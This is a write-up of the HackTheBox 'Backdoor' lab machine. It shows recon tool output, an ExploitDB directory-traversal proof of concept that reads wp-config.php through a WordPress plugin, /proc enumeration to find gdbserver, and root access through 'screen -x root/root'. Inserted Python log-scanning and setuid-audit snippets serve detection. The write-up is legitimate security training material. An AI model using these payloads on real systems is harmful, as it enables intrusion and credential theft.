The Backdoor machine on HackTheBox has just retired! This is my write-up about the Backdoor machine on HackTheBox. Here I detail the penetration testing steps taken to scan, exploit, and privilege escalate on this target machine. This machine is categorized as easy and was retired on April 23, 2022.
IP Address: 10.10.11.125
A vulnerable WordPress plugin allows local file inclusion. That file read is used to enumerate /proc and identify a gdbserver instance listening on a non-standard port. The gdbserver service can be exploited for code execution and initial access. A SUID screen binary then allows attaching to an active root-level screen session for root privileges.
The Nmap scan shows an HTTP server on port 80/tcp and an unidentified service on port 1337/tcp.
```
# nmap -sV -sC -p- 10.10.11.125
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 17:41 EDT
Nmap scan report for 10.10.11.125
Host is up (0.069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.18 seconds
```
We can see that the website is a plain site running on port 80/tcp. Nothing here of interest.
Nikto tells us that there is WordPress running on the target and that a few interesting directories are available.
```
# nikto --host http://10.10.11.125/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.125
+ Target Hostname:    10.10.11.125
+ Target Port:        80
+ Start Time:         2022-04-22 17:41:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.11.125/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.11.125/index.php/wp-json/wp/v2/pages/11>; rel="alternate"; type="application/json",<http://10.10.11.125/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: WordPress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: WordPress login found
+ 7889 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2022-04-22 17:50:14 (GMT-4) (511 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Gobuster shows a few more interesting WordPress directories to check out.
```
# gobuster dir -u http://10.10.11.125/ -w /usr/share/wordlists/dirpwn.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.125/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirpwn.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/22 17:41:55 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.11.125/]
/server-status        (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
/wp-admin             (Status: 301) [Size: 315] [--> http://10.10.11.125/wp-admin/]
/wp-admin             (Status: 301) [Size: 315] [--> http://10.10.11.125/wp-admin/]
/wp-content           (Status: 301) [Size: 317] [--> http://10.10.11.125/wp-content/]
/wp-includes          (Status: 301) [Size: 318] [--> http://10.10.11.125/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]
===============================================================
2022/04/22 18:03:36 Finished
===============================================================
```
WPScan provided a lot of information, some of which I cut here to save space. The key information it found was a vulnerable ebook-download plugin.
```
# wpscan --url http://10.10.11.125/ -e ap,u --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Fri Apr 22 17:43:29 2022

Interesting Finding(s):
-----SNIP-----

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:19:43 <========================================================================> (97836 / 97836) 100.00% Time: 00:19:43
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] ebook-download
 | Location: http://10.10.11.125/wp-content/plugins/ebook-download/
 | Last Updated: 2020-03-12T12:52:00.000Z
 | Readme: http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/ebook-download/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Ebook Download < 1.2 - Directory Traversal
 |     Fixed in: 1.2
 |     References:
 |      - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10924
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Finished: Fri Apr 22 18:03:33 2022
[+] Requests Done: 97915
[+] Cached Requests: 7
[+] Data Sent: 26.27 MB
[+] Data Received: 28.875 MB
[+] Memory used: 468.273 MB
[+] Elapsed time: 00:20:04
```
The identified “ebook-download” plugin can be accessed directly with a directory listing.
Looking at the plugin’s readme, we can see it is version 1.1.
A directory traversal vulnerability is present in “ebook-download” version 1.1 and there is an exploit available in ExploitDB. Let’s try it.
WordPress Plugin eBook Download 1.1 – Directory Traversal
```
# Exploit Title: WordPress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================

[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
```
Run the exploit from ExploitDB.
The exploit works! We’re able to read local files on the target. We can even get the WordPress database password but this won’t do any good because we don’t have a way to access the database. There doesn’t seem to be any password reuse for SSH or the WordPress admin login either. Some other file will need to be read to gain initial access.
This blog post suggests brute-forcing the /proc directory for different PIDs to identify running services on the system. Remember, everything in Linux is a file. This may help us identify what service is really running on port 1337/tcp.
Using Burp Suite Intruder, I brute-forced web requests to identify any possible PIDs running a service on the target. The directory checked was /proc/[PID]/cmdline. I eventually got a hit! PID 844 showed gdbserver listening on port 1337/tcp. That’s our target service.
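From the defensive side, both the plugin traversal and the /proc/[PID]/cmdline sweep described above leave a distinctive trail in the web server's access log. The Python below is an added example, not code from the original write-up: it parses constructed Apache combined-log lines (the client IPs, timestamps and the two-request threshold are assumptions), decodes the ebookdownloadurl parameter, and tags traversal, wp-config.php reads and clients sweeping /proc.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not captured from the box).
SAMPLE_LOG = """\
10.10.14.7 - - [22/Apr/2022:17:52:01 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3105 "-" "Mozilla/5.0"
10.10.14.7 - - [22/Apr/2022:17:55:10 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2F..%2F..%2Fproc%2F844%2Fcmdline HTTP/1.1" 200 56 "-" "python-requests/2.27"
10.10.14.7 - - [22/Apr/2022:17:55:11 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2F..%2F..%2Fproc%2F845%2Fcmdline HTTP/1.1" 200 0 "-" "python-requests/2.27"
10.10.14.9 - - [22/Apr/2022:17:57:00 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=uploads/guide.pdf HTTP/1.1" 200 91000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PROC_RE = re.compile(r'/proc/(?:\d+|self)/')

def classify_request(target):
    """Tag one request target; returns [] for anything that is not a suspicious plugin call."""
    parts = urlsplit(target)
    if not parts.path.endswith("/ebook-download/filedownload.php"):
        return []
    raw = parse_qs(parts.query).get("ebookdownloadurl", [""])[0]
    # parse_qs already decoded once; decode again so double-encoded traversal is not missed.
    value = unquote(raw)
    tags = []
    if "../" in value or "..\\" in value:
        tags.append("traversal")
    if PROC_RE.search(value):
        tags.append("proc-enum")
    if value.endswith("wp-config.php"):
        tags.append("wp-config")
    return tags

def scan_log(text, proc_threshold=2):
    """Return (findings, sweepers): every tagged request, plus client IPs that read
    /proc through the plugin proc_threshold or more times (the PID brute-force pattern)."""
    findings = []
    proc_hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["target"])
        if tags:
            findings.append((m["ip"], int(m["status"]), tags))
        if "proc-enum" in tags:
            proc_hits[m["ip"]] = proc_hits.get(m["ip"], 0) + 1
    sweepers = sorted(ip for ip, n in proc_hits.items() if n >= proc_threshold)
    return findings, sweepers
```

Point it at a real access log with `scan_log(open(path).read())`; the benign `uploads/guide.pdf` request produces no finding, which is the false-positive case to keep checking as you tune the threshold.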
A quick Google search for connecting to gdbserver revealed that there is a Metasploit module to obtain a shell on the target. A quick Metasploit setup was needed and then I had initial user-level access to the target.
Going through my normal privilege escalation processes of checking sudo, SUIDs, writable files, etc., I eventually came around to running Pspy to see if I could pick up on any processes running that I didn’t see before. I ended up seeing an interesting screen command running with the name of root.
Pairing this information with seeing SUID set for screen in my previous enumeration, this looked like a privilege escalation route.
Checking the help menu for screen showed an interesting -x option that allows us to “Attach to a not detached screen.”
At first, attempting this in my Meterpreter shell caused some issues, so I had to upgrade my shell and work through those issues first.
Setting a terminal type then running the following command worked!
```
export TERM=xterm
screen -x root/root
```
We have the root-level shell.
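A hardening check for exactly this path: the two conditions the escalation above relied on were a setuid screen binary and a live root-owned screen session. The Python below is an added example, not from the write-up or from pspy; the binary and socket directory paths are assumptions about a typical install, and demo() builds a constructed fake root under a temp directory rather than inspecting the real system.

```python
import os
import stat
import tempfile

# Assumed locations: where distros usually install screen, and where it keeps per-user
# session directories (S-<user>, one socket per session).
SCREEN_BINARIES = ("usr/bin/screen", "bin/screen", "usr/local/bin/screen")
SOCKET_DIRS = ("run/screen", "var/run/screen", "tmp/screens")

def is_setuid(path):
    """True if path exists and carries the setuid bit; confirm the owner separately on a real host."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False

def audit_screen(root="/"):
    """Return (kind, path) findings for the two conditions seen on this box:
    a setuid screen binary and a non-empty S-<user> session directory."""
    findings = []
    for rel in SCREEN_BINARIES:
        path = os.path.join(root, rel)
        if is_setuid(path):
            findings.append(("setuid-screen", path))
    for rel in SOCKET_DIRS:
        base = os.path.join(root, rel)
        if not os.path.isdir(base):
            continue
        for entry in sorted(os.listdir(base)):
            userdir = os.path.join(base, entry)
            # a non-empty S-<user> directory means that user has a session someone could attach to
            if entry.startswith("S-") and os.path.isdir(userdir) and os.listdir(userdir):
                findings.append(("live-session", userdir))
    return findings

def demo():
    """Constructed fixture (test data, not a real host): reproduce the box's state in a temp root."""
    root = tempfile.mkdtemp()
    binpath = os.path.join(root, "usr/bin/screen")
    os.makedirs(os.path.dirname(binpath))
    open(binpath, "w").close()
    os.chmod(binpath, 0o4755)  # setuid bit, as found on the target
    session = os.path.join(root, "run/screen/S-root")
    os.makedirs(session)
    open(os.path.join(session, "1234.root"), "w").close()  # socket name screen -dmS root would create
    return [kind for kind, _ in audit_screen(root)]
```

Running audit_screen() with the default root on a real host needs enough privilege to list the session directories; an empty result means neither condition is present.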
Other than the points on HackTheBox, the lessons learned are the real treasures for this box.
- Using file read vulnerabilities to check for running processes in /proc is extremely valuable! The methodology used for this box, and other methodologies like the one mentioned here, are very useful when trying to gain initial access from a file read vulnerability.
- Pspy is awesome. As much as Pspy always seems to be a last resort for me, it always wins. The tool gives visibility into activity on the box that you would never see otherwise.
Thank you for reading my write-up for the Backdoor machine on HackTheBox. Be sure to check out my other write-ups for HackTheBox!